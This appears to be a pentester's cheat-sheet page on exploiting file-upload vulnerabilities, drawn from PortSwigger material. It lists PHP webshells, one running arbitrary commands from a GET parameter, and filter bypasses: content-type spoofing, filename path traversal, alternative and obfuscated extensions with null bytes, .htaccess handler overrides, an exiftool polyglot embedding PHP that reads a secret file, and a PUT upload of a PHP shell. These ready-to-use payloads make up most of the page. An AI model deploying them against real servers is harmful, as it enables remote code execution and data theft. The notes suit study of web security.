Link Search Menu Expand Document
Zyber

php webshell examples 

<?php echo file_get_contents('/path/to/target/file'); ?>
<?php echo system($_GET['command']); ?>

Consider the example:

POST /images HTTP/1.1
Host: normal-website.com
Content-Length: 12345
Content-Type: multipart/form-data; boundary=---------------------------012345678901234567890123456

---------------------------012345678901234567890123456
Content-Disposition: form-data; name="image"; filename="example.jpg"
Content-Type: image/jpeg

[...binary content of example.jpg...]

---------------------------012345678901234567890123456
Content-Disposition: form-data; name="description"

This is an interesting description of my image.

---------------------------012345678901234567890123456
Content-Disposition: form-data; name="username"

wiener
---------------------------012345678901234567890123456--

Content-Type restriction bypass

Upload a php file, intercept the request and change the content-type to an image mime type.

Abuse filename for traversal

It may be possible to use traversal in the filename:

Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"
etc

insufficient blacklisting

Sometimes not all file extension are whitelisted:

.php4, .php5
.shtml 
etc

When php is not enabled it may be when uploading .htaccess to a folder:

LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php

This enables execution of php files when running apache When .php is filtered you can use any extension and upload one of those:

LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .l33t

Or upload a web.condif file in case of iis:

<staticContent>
    <mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>

Obfuscating file extensions 

exploit.php.jpg
exploit.php.
exploit%2Ephp
exploit.asp;.jpg
exploit.asp%00.jpg
xC0 x2E, xC4 xAE or xC0 xAE may be translated to x2E if the filename parsed as a UTF-8 string
exploit.p.phphp
etc

flawed validation of file content

Example by creating a polyglot (file in a file)

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

malicious client side scripts:

When you can upload html or svg,

Or exploit vulns in parsing like XXE in docx, xlsx or xml files.

upload using put 

PUT /images/exploit.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 49

<?php echo file_get_contents('/path/to/file'); ?>

ref portswigger

40397ac9 (main) : 2023-01-11T20:40:16+01:00